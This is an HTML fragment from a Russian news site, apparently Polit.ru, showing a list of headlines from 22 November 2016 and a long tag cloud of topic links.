        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 16:27</span>
            </span><a href="/news/2016/11/22/dadin_fight/" class="hover">Дадин и его сокамерник получили дисциплинарные взыскания</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 16:18</span>
            </span><a href="/news/2016/11/22/swiss_watch/" class="hover">Мировой экспорт швейцарских часов снизился до семилетнего минимума</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 16:14</span>
            </span><a href="/news/2016/11/22/doping_declination/" class="hover">В России ввели уголовную ответственность за склонение спортсменов к допингу</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 15:48</span>
            </span><a href="/news/2016/11/22/ps_valley/" class="hover">Великая долина Меркурия превосходит Большой каньон в Аризоне</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 15:47</span>
            </span><a href="/news/2016/11/22/shy/" class="hover">Путин признался в робости после торжественного объявления на форуме ОНФ</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 15:46</span>
            </span><a href="/news/2016/11/22/karaulova/" class="hover">Варвара Караулова отказалась в суде от признательных показаний</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 15:23</span>
            </span><a href="/news/2016/11/22/new_government/" class="hover">В парламенте Черногории договорились о новом правительстве</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 15:16</span>
            </span><a href="/news/2016/11/22/minoborony_ukr/" class="hover">Минобороны Украины обвинило похищенных российских военных в измене присяге  </a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 14:52</span>
            </span><a href="/news/2016/11/22/karimova_murder/" class="hover">Источник сообщил об убийстве Гульнары Каримовой </a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 14:45</span>
            </span><a href="/news/2016/11/22/retiree_payment/" class="hover">Путин подписал закон о единовременной выплате пенсионерам</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 14:42</span>
            </span><a href="/news/2016/11/22/alkhazov/" class="hover">В Минкомсвязи сменился куратор «пакета Яровой»</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 14:27</span>
            </span><a href="/news/2016/11/22/zakharchenko_arrest/" class="hover">Суд арестовал счета полковника Захарченко</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 14:17</span>
            </span><a href="/news/2016/11/22/peskov_ap/" class="hover">В Кремле предложили сотрудникам АП самим определиться с корпоративом</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">22.11 14:07</span>
            </span><a href="/news/2016/11/22/ps_ginkgo/" class="hover">Прочитан геном древнего дерева гинкго</a>
        </div>
    

    
    
    
    
    
    
    

</div>


  
  
    


  

<div class="tags-cloud">

  

  

  

  

  

  
  <a href="/tag/apple/" class="weight8">Apple</a>
  

  

  

  

  

  

  

  
  <a href="/tag/boeing/" class="weight8">Boeing</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/facebook/" class="weight7">Facebook</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/google/" class="weight7">Google</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/it/" class="weight4">IT</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/nato/" class="weight9">NATO</a>
  

  

  

  

  

  
  <a href="/tag/pro-science-video/" class="weight0 macrotag">PRO SCIENCE видео</a>
  

  
  <a href="/tag/proscience-theatre/" class="weight8 force-hi macrotag">ProScience Театр</a>
  

  
  <a href="/tag/pussy-riot/" class="weight8">Pussy Riot</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/twitter/" class="weight7">Twitter</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/railwayincidents/" class="weight7">аварии на железной дороге</a>
  

  

  
  <a href="/tag/aviakatastrofa/" class="weight10 force-hi">авиакатастрофа</a>
  

  

  
  <a href="/tag/australia/" class="weight8">Австралия</a>
  

  
  <a href="/tag/avstriya/" class="weight4">Австрия</a>
  

  

  

  

  

  

  

  
  <a href="/tag/avtoprom/" class="weight9">автопром</a>
  

  

  

  

  
  <a href="/tag/administraciya-prezidenta/" class="weight6">администрация президента</a>
  

  

  

  

  
  <a href="/tag/azerbaijan/" class="weight7">Азербайджан</a>
  

  

  

  

  

  

  

  
  <a href="/tag/akcii-protesta/" class="weight9">акции протеста</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/aleksandr-lukashenko/" class="weight7">Александр Лукашенко</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/aleksej-kudrin/" class="weight5">Алексей Кудрин</a>
  

  

  

  

  

  
  <a href="/tag/alexey_navalny/" class="weight9">Алексей Навальный</a>
  

  

  

  

  

  
  <a href="/tag/aleksej-ulyukaev/" class="weight7">Алексей Улюкаев</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/alcohol/" class="weight8">алкоголь</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/amnisty/" class="weight6">амнистия</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/anatolij-serdyukov/" class="weight6">Анатолий Сердюков</a>
  

  

  

  

  

  
  <a href="/tag/angela-merkel/" class="weight8">Ангела Меркель</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/antimajdan/" class="weight10 force-hi">Антимайдан</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/armeniya/" class="weight8">Армения</a>
  

  
  <a href="/tag/army/" class="weight11 force-hi">армия</a>
  

  

  

  

  
  <a href="/tag/arsenij-yacenyuk/" class="weight8">Арсений Яценюк</a>
  

  

  

  

  

  

  

  
  <a href="/tag/archeology/" class="weight8">археология</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/astronomy_topic/" class="weight8">астрономия</a>
  

  

  

  

  

  

  
  <a href="/tag/nuclear_energy/" class="weight10 force-hi">атомная энергия</a>
  

  

  

  
  <a href="/tag/aukciony/" class="weight2">аукционы</a>
  

  

  

  
  <a href="/tag/afganistan/" class="weight8">Афганистан</a>
  

  

  

  

  
  <a href="/tag/aeroflot/" class="weight7">Аэрофлот</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/mezhkontinentalnye-ballisticheskie-rakety/" class="weight6">баллистические ракеты</a>
  

  

  

  

  

  
  <a href="/tag/bankovskij-sektor/" class="weight10 force-hi">банковский сектор</a>
  

  
  <a href="/tag/bankrotstvo/" class="weight6">банкротство</a>
  

  
  <a href="/tag/barak-obama/" class="weight10">Барак Обама</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/bashar-asad/" class="weight7">Башар Асад</a>
  

  
  <a href="/tag/bashkiriya/" class="weight5">Башкирия</a>
  

  

  
  <a href="/tag/bezhency/" class="weight8">беженцы</a>
  

  

  

  

  

  

  
  <a href="/tag/Belarus/" class="weight9">Белоруссия</a>
  

  

  

  
  <a href="/tag/belgiya/" class="weight7">Бельгия</a>
  

  

  

  

  

  
  <a href="/tag/besporyadki/" class="weight9">беспорядки</a>
  

  

  

  

  

  

  

  
  <a href="/tag/biznes/" class="weight8">бизнес</a>
  

  

  

  

  
  <a href="/tag/biology/" class="weight10">биология </a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/izr/" class="weight9">ближневосточный конфликт</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/boks/" class="weight6">бокс</a>
  

  

  
  <a href="/tag/football_fans/" class="weight7">болельщики</a>
  

  

  

  
  <a href="/tag/bolotnoe-delo/" class="weight8">«болотное дело»</a>
  

  

  

  

  
  <a href="/tag/bolshoj-tennis/" class="weight6">большой теннис</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/boris-nemcov/" class="weight8">Борис Немцов</a>
  

  

  

  

  

  

  

  
  <a href="/tag/braziliya/" class="weight8">Бразилия</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/vvp/" class="weight4">ВВП</a>
  

  

  

  

  

  

  
  <a href="/tag/velikaya-otechestvennaya-vojna/" class="weight7">Великая Отечественная война</a>
  

  

  
  <a href="/tag/UK/" class="weight10 force-hi">Великобритания</a>
  

  

  

  
  <a href="/tag/venesuela/" class="weight7">Венесуэла</a>
  

  

  

  

  

  

  
  <a href="/tag/verhovnaya-rada/" class="weight9">Верховная Рада</a>
  

  
  <a href="/tag/verhovnyj-sud/" class="weight6">Верховный суд</a>
  

  

  

  
  <a href="/tag/vzryv/" class="weight10">взрыв</a>
  

  
  <a href="/tag/bribe/" class="weight8">взятка</a>
  

  
  <a href="/tag/videon_lectures/" class="weight6">видеозаписи публичных лекций «Полит.ру»</a>
  

  
  <a href="/tag/video/" class="weight9">видео «Полит.ру»</a>
  

  

  

  
  <a href="/tag/vizovyj-rezhim/" class="weight7">визовый режим</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/viktor-yanukovich/" class="weight8">Виктор Янукович</a>
  

  

  

  
  <a href="/tag/virus/" class="weight6 force-hi">вирусы</a>
  

  

  

  

  
  <a href="/tag/vitalij-mutko/" class="weight7">Виталий Мутко</a>
  

  

  

  

  

  
  <a href="/tag/vkontakte/" class="weight7">«ВКонтакте»</a>
  

  
  <a href="/tag/airborne/" class="weight8">ВКС</a>
  

  
  <a href="/tag/vladivostok/" class="weight5">Владивосток</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/vladimir-zhirinovskij/" class="weight6">Владимир Жириновский</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/vladimir-markin/" class="weight4">Владимир Маркин</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/vladimir-putin/" class="weight12 force-hi">Владимир Путин</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/vmf/" class="weight8">ВМФ</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/air_force/" class="weight9">военная авиация</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/volgograd/" class="weight6">Волгоград</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/vtb/" class="weight3">ВТБ</a>
  

  
  <a href="/tag/vtoraya-mirovaya-vojna/" class="weight6">Вторая мировая война</a>
  

  

  
  <a href="/tag/vuzy/" class="weight8">вузы</a>
  

  

  

  
  <a href="/tag/vybory/" class="weight11 force-hi">выборы</a>
  

  
  <a href="/tag/vybory-gubernatorov/" class="weight6">выборы губернаторов</a>
  

  
  <a href="/tag/vybory-mera-moskvy/" class="weight7">выборы мэра Москвы</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/gazovaya-promyshlennost/" class="weight9">газовая промышленность</a>
  

  

  

  
  <a href="/tag/gazprom/" class="weight10">«Газпром»</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/genetics/" class="weight7">генетика</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/genprokuratura/" class="weight9">Генпрокуратура</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/germaniya/" class="weight10">Германия</a>
  

  

  

  

  
  <a href="/tag/gibdd/" class="weight7">ГИБДД</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/glonass/" class="weight2">ГЛОНАСС</a>
  

  

  

  

  

  

  

  
  <a href="/tag/hollywood/" class="weight6">Голливуд</a>
  

  

  

  
  <a href="/tag/homosexuality/" class="weight5">гомосексуализм</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/gosbyudzhet/" class="weight9">госбюджет</a>
  

  
  <a href="/tag/gosdep/" class="weight8">Госдеп</a>
  

  
  <a href="/tag/gosduma/" class="weight11 force-hi">Госдума</a>
  

  
  <a href="/tag/goszakupki/" class="weight5">госзакупки</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/grazhdanskaya-aviaciya/" class="weight11 force-hi">гражданская авиация</a>
  

  

  

  

  
  <a href="/tag/greece/" class="weight9">Греция</a>
  

  

  

  

  

  
  <a href="/tag/greenpeace/" class="weight6">Гринпис</a>
  

  

  

  

  
  <a href="/tag/georgia/" class="weight10 force-hi">Грузия</a>
  

  

  

  

  
  <a href="/tag/gumanitarnaya-pomosh/" class="weight6">гуманитарная помощь</a>
  

  
  <a href="/tag/liberal_arts/" class="weight8">гуманитарные и социальные  науки</a>
  

  

  

  

  

  
  <a href="/tag/dagestan/" class="weight9">Дагестан</a>
  

  

  
  <a href="/tag/dalnij-vostok/" class="weight7">Дальний Восток</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/dengi/" class="weight6">деньги</a>
  

  

  
  <a href="/tag/den-pobedy/" class="weight6">День Победы</a>
  

  

  

  
  <a href="/tag/deti/" class="weight10">дети</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/dmitriy_medvedev/" class="weight10 force-hi">Дмитрий Медведев</a>
  

  

  
  <a href="/tag/dmitrij-peskov/" class="weight9">Дмитрий Песков</a>
  

  
  <a href="/tag/dmitrij-rogozin/" class="weight7">Дмитрий Рогозин</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/dollar/" class="weight9">доллар</a>
  

  

  

  

  

  
  <a href="/tag/domodedovo/" class="weight7">Домодедово</a>
  

  
  <a href="/tag/donald-tramp/" class="weight8">Дональд Трамп</a>
  

  

  
  <a href="/tag/doneck/" class="weight11 force-hi">Донецк</a>
  

  

  
  <a href="/tag/doping/" class="weight9">допинг</a>
  

  
  <a href="/tag/russian_roads/" class="weight6">дороги России</a>
  

  

  
  <a href="/tag/draka/" class="weight7">драка</a>
  

  

  

  

  
  <a href="/tag/dtp/" class="weight10 force-hi">ДТП</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/evgeniya-vasileva/" class="weight7">Евгения Васильева</a>
  

  

  

  
  <a href="/tag/evro/" class="weight9">евро</a>
  

  

  

  

  
  <a href="/tag/evrokomissiya/" class="weight4">Еврокомиссия</a>
  

  
  <a href="/tag/evromajdan/" class="weight10">Евромайдан</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/EU/" class="weight11 force-hi">Евросоюз</a>
  

  
  <a href="/tag/egipet/" class="weight9">Египет</a>
  

  

  
  <a href="/tag/obraz/" class="weight9">ЕГЭ</a>
  

  
  <a href="/tag/edinaya-rossiya/" class="weight9">«Единая Россия»</a>
  

  

  

  

  
  <a href="/tag/ekaterinburg/" class="weight7">Екатеринбург</a>
  

  

  

  

  

  

  

  
  <a href="/tag/espch/" class="weight4">ЕСПЧ</a>
  

  
  <a href="/tag/natural_sciences/" class="weight8 force-hi macrotag">естественные и точные науки</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/zhkh/" class="weight8">ЖКХ</a>
  

  

  

  
  <a href="/tag/zhurnalisty/" class="weight9">журналисты</a>
  

  
  <a href="/tag/zabajkalskij-kraj/" class="weight3">Забайкальский край</a>
  

  

  

  
  <a href="/tag/foreign_agents_law/" class="weight7">закон об «иностранных агентах»</a>
  

  

  
  <a href="/tag/zakonotvorchestvo/" class="weight10 force-hi">законотворчество</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/healthcare_russia/" class="weight7">здравоохранение в России</a>
  

  

  
  <a href="/tag/zemletryasenie/" class="weight8">землетрясение</a>
  

  

  
  <a href="/tag/zenit/" class="weight6">«Зенит»</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/israel/" class="weight9">Израиль</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/India/" class="weight8">Индия</a>
  

  
  <a href="/tag/indonesia/" class="weight6">Индонезия</a>
  

  

  
  <a href="/tag/innovation/" class="weight7">инновации</a>
  

  

  

  

  

  

  
  <a href="/tag/science_interview/" class="weight5">Интервью ученых</a>
  

  
  <a href="/tag/internet/" class="weight10 force-hi">интернет</a>
  

  

  
  <a href="/tag/inflation/" class="weight6">инфляция</a>
  

  

  

  

  

  
  <a href="/tag/irak/" class="weight9">Ирак</a>
  

  

  
  <a href="/tag/iraqafterwar/" class="weight9">Ирак после войны</a>
  

  
  <a href="/tag/iran/" class="weight9">Иран</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/irkutskaya-oblast/" class="weight7">Иркутская область</a>
  

  

  

  

  
  <a href="/tag/islam/" class="weight8">ислам</a>
  

  

  
  <a href="/tag/islamskoe-gosudarstvo-iraka-i-levanta/" class="weight10 force-hi">«Исламское государство»</a>
  

  

  
  <a href="/tag/spain/" class="weight8">Испания</a>
  

  

  

  

  
  <a href="/tag/history/" class="weight9">история</a>
  

  

  

  

  

  
  <a href="/tag/istoria/" class="weight6">История человечества</a>
  

  
  <a href="/tag/italy/" class="weight8">Италия</a>
  

  

  

  

  
  <a href="/tag/jemen/" class="weight7">Йемен</a>
  

  

  

  

  

  

  
  <a href="/tag/kazan/" class="weight7">Казань</a>
  

  
  <a href="/tag/kazahstan/" class="weight8">Казахстан</a>
  

  

  

  

  
  <a href="/tag/kazn/" class="weight5">казнь</a>
  

  

  

  

  
  <a href="/tag/kaliningrad/" class="weight1">Калининград</a>
  

  

  

  

  

  

  
  <a href="/tag/kamchatka/" class="weight5">Камчатка</a>
  

  
  <a href="/tag/canada/" class="weight8">Канада</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/kiev/" class="weight9">Киев</a>
  

  

  

  

  
  <a href="/tag/kino/" class="weight10 force-hi">кино</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/china/" class="weight10">Китай</a>
  

  

  

  

  
  <a href="/tag/climate/" class="weight6">Климат Земли, атмосферные явления</a>
  

  

  

  

  
  <a href="/tag/kndr/" class="weight9">КНДР</a>
  

  

  
  <a href="/tag/books/" class="weight4">Книга. Знание</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/comp/" class="weight5">Компьютеры, программное обеспечение</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/korablekrushenie/" class="weight7">кораблекрушение</a>
  

  

  

  

  

  
  <a href="/tag/corruption/" class="weight10 force-hi">коррупция</a>
  

  

  

  

  
  <a href="/tag/vosto/" class="weight5">космодром Восточный</a>
  

  

  

  

  

  
  <a href="/tag/space/" class="weight10 force-hi">космос</a>
  

  

  

  

  
  <a href="/tag/kprf/" class="weight7">КПРФ</a>
  

  
  <a href="/tag/theft/" class="weight7">кража</a>
  

  

  

  

  

  
  <a href="/tag/krasnodarskij-kraj/" class="weight7">Краснодарский край</a>
  

  

  
  <a href="/tag/krasnoyarskij-kraj/" class="weight6">Красноярский край</a>
  

  

  

  
  <a href="/tag/debts/" class="weight9">кредиты</a>
  

  
  <a href="/tag/kreml/" class="weight8">Кремль</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/helicopter_crush/" class="weight7">крушение вертолета</a>
  

  

  

  

  
  <a href="/tag/krym/" class="weight11 force-hi">Крым</a>
  

  

  
  <a href="/tag/krymskij-krizis/" class="weight9">крымский кризис</a>
  

  

  
  <a href="/tag/kuba/" class="weight5">Куба</a>
  

  

  

  
  <a href="/tag/kultura/" class="weight7 force-hi">культура</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/latviya/" class="weight7">Латвия</a>
  

  

  

  

  
  <a href="/tag/lgbt/" class="weight7">ЛГБТ</a>
  

  
  <a href="/tag/ldpr/" class="weight7">ЛДПР</a>
  

  
  <a href="/tag/levada-centr/" class="weight3">Левада-Центр</a>
  

  

  

  

  

  

  
  <a href="/tag/legkaya-atletika/" class="weight6">легкая атлетика</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/lesnye-pozhary/" class="weight6">лесные пожары</a>
  

  

  

  

  

  

  

  
  <a href="/tag/liviya/" class="weight6">Ливия</a>
  

  

  

  

  
  <a href="/tag/linguistics/" class="weight4">лингвистика</a>
  

  

  

  
  <a href="/tag/lithuania/" class="weight6">Литва</a>
  

  
  <a href="/tag/literatura/" class="weight7">литература</a>
  

  

  

  

  

  

  
  <a href="/tag/london/" class="weight6">Лондон</a>
  

  

  

  
  <a href="/tag/lugansk/" class="weight10">Луганск</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/malajziya/" class="weight7">Малайзия</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/mvd/" class="weight10">МВД</a>
  

  
  <a href="/tag/imf/" class="weight6">МВФ</a>
  

  

  

  

  

  

  
  <a href="/tag/media/" class="weight10">медиа</a>
  

  
  <a href="/tag/medicine/" class="weight10 force-hi">медицина</a>
  

  

  
  <a href="/tag/interdisciplinary_research/" class="weight0 force-hi macrotag">междисциплинарные исследования</a>
  

  

  

  

  

  
  <a href="/tag/meksika/" class="weight7">Мексика</a>
  

  

  

  
  <a href="/tag/memoriya/" class="weight9">Мемория</a>
  

  

  

  

  
  <a href="/tag/metro/" class="weight9">метро</a>
  

  

  

  

  

  
  <a href="/tag/gastarbeiter/" class="weight9">мигранты</a>
  

  
  <a href="/tag/mid-rossii/" class="weight10">МИД России</a>
  

  

  

  

  
  <a href="/tag/minzdrav/" class="weight7">Минздрав</a>
  

  

  

  
  <a href="/tag/minkomsvyazi/" class="weight6">Минкомсвязи</a>
  

  
  <a href="/tag/minkult/" class="weight7">Минкульт</a>
  

  
  <a href="/tag/minoborony/" class="weight10 force-hi">Минобороны</a>
  

  
  <a href="/tag/minobrnauki/" class="weight7">Минобрнауки</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/mintrud/" class="weight6">Минтруд</a>
  

  
  <a href="/tag/minfin/" class="weight9">Минфин</a>
  

  
  <a href="/tag/minekonomrazvitiya/" class="weight9">Минэкономразвития</a>
  

  

  
  <a href="/tag/minjust/" class="weight7">Минюст</a>
  

  
  <a href="/tag/crisis/" class="weight10">мировой экономический кризис</a>
  

  

  
  <a href="/tag/mistral/" class="weight5">«Мистраль»</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/mihail-saakashvili/" class="weight7">Михаил Саакашвили</a>
  

  

  

  

  

  
  <a href="/tag/mihail-hodorkovskij/" class="weight7">Михаил Ходорковский</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/iss/" class="weight9">МКС</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/moldaviya/" class="weight7">Молдавия</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/mosgorsud/" class="weight7">Мосгорсуд</a>
  

  

  
  <a href="/tag/moskva/" class="weight12 force-hi">Москва</a>
  

  

  

  
  <a href="/tag/moskovskaya-oblast/" class="weight10">Московская область</a>
  

  

  

  

  

  

  

  
  <a href="/tag/moshennichestvo/" class="weight9">мошенничество</a>
  

  

  

  

  

  

  

  
  <a href="/tag/music/" class="weight9">музыка</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/mchs/" class="weight9">МЧС</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/navodnenie/" class="weight7">наводнение</a>
  

  

  

  
  <a href="/tag/nadezhda-savchenko/" class="weight8">Надежда Савченко</a>
  

  

  

  
  <a href="/tag/nalogi/" class="weight8">налоги</a>
  

  

  

  

  
  <a href="/tag/nanotechnology_topic/" class="weight7">нанотехнологии</a>
  

  
  <a href="/tag/drugs/" class="weight9">наркотики</a>
  

  

  

  

  
  <a href="/tag/nasa/" class="weight5 force-hi">НАСА</a>
  

  

  

  

  

  
  <a href="/tag/nauka/" class="weight7">наука</a>
  

  

  
  <a href="/tag/science_ru/" class="weight10">Наука в современной России</a>
  

  

  

  
  <a href="/tag/naftogaz-ukrainy/" class="weight8">«Нафтогаз Украины»</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/nko/" class="weight5">некоммерческие организации</a>
  

  
  <a href="/tag/nekrolog/" class="weight8">некролог</a>
  

  

  

  

  

  
  <a href="/tag/bunt/" class="weight3">Нерусский бунт</a>
  

  
  <a href="/tag/oil/" class="weight10">нефть</a>
  

  

  
  <a href="/tag/nigeria/" class="weight6">Нигерия</a>
  

  
  <a href="/tag/netherlands/" class="weight8">Нидерланды</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/Nobel_prize/" class="weight7 force-hi">Нобелевская премия</a>
  

  

  

  

  

  

  

  
  <a href="/tag/novosibirsk/" class="weight7">Новосибирск</a>
  

  

  

  
  <a href="/tag/newtech/" class="weight8">Новые технологии, инновации</a>
  

  

  
  <a href="/tag/new_year/" class="weight3">Новый год</a>
  

  

  
  <a href="/tag/Norway/" class="weight2">Норвегия</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/new-york/" class="weight6">Нью-Йорк</a>
  

  

  

  

  

  

  

  
  <a href="/tag/oboronservis/" class="weight8">«Оборонсервис»</a>
  

  

  
  <a href="/tag/niu/" class="weight9">образование</a>
  

  

  
  <a href="/tag/obrushenie/" class="weight3">обрушение</a>
  

  
  <a href="/tag/obse/" class="weight8">ОБСЕ</a>
  

  

  

  

  

  

  
  <a href="/tag/obshestvennyj-transport/" class="weight6">общественный транспорт</a>
  

  
  <a href="/tag/society/" class="weight0 force-hi macrotag">общество</a>
  

  

  

  

  
  <a href="/tag/robbery/" class="weight8">ограбление</a>
  

  

  

  
  <a href="/tag/odessa/" class="weight7">Одесса</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/olympics/" class="weight9">Олимпийские игры</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/UN/" class="weight9">ООН</a>
  

  

  

  

  

  
  <a href="/tag/oppoziciya/" class="weight8">оппозиция</a>
  

  
  <a href="/tag/oprosy/" class="weight10">опросы</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/arms/" class="weight9">оружие</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/otstavki-naznacheniya/" class="weight10">отставки-назначения</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/pakistan/" class="weight7">Пакистан</a>
  

  
  <a href="/tag/paleontology/" class="weight4">палеонтология</a>
  

  
  <a href="/tag/palestinskaya-avtonomiya/" class="weight6">Палестинская автономия</a>
  

  

  

  

  

  

  
  <a href="/tag/pope/" class="weight3">Папа Римский</a>
  

  

  

  

  
  <a href="/tag/paris/" class="weight8">Париж</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/pdd/" class="weight5">ПДД</a>
  

  

  

  
  <a href="/tag/pedophylia/" class="weight4">педофилия</a>
  

  

  

  

  
  <a href="/tag/pensionnaya-reforma/" class="weight8">пенсионная реформа</a>
  

  
  <a href="/tag/pentagon/" class="weight7">Пентагон</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/petr-poroshenko/" class="weight10">Петр Порошенко</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/pogranvojska/" class="weight7">погранвойска</a>
  

  

  

  

  

  
  <a href="/tag/pozhar/" class="weight10">пожар</a>
  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/police/" class="weight10 force-hi">полиция</a>
  

  

  

  

  
  <a href="/tag/polsha/" class="weight8">Польша</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/kidnapping/" class="weight3">похищение</a>
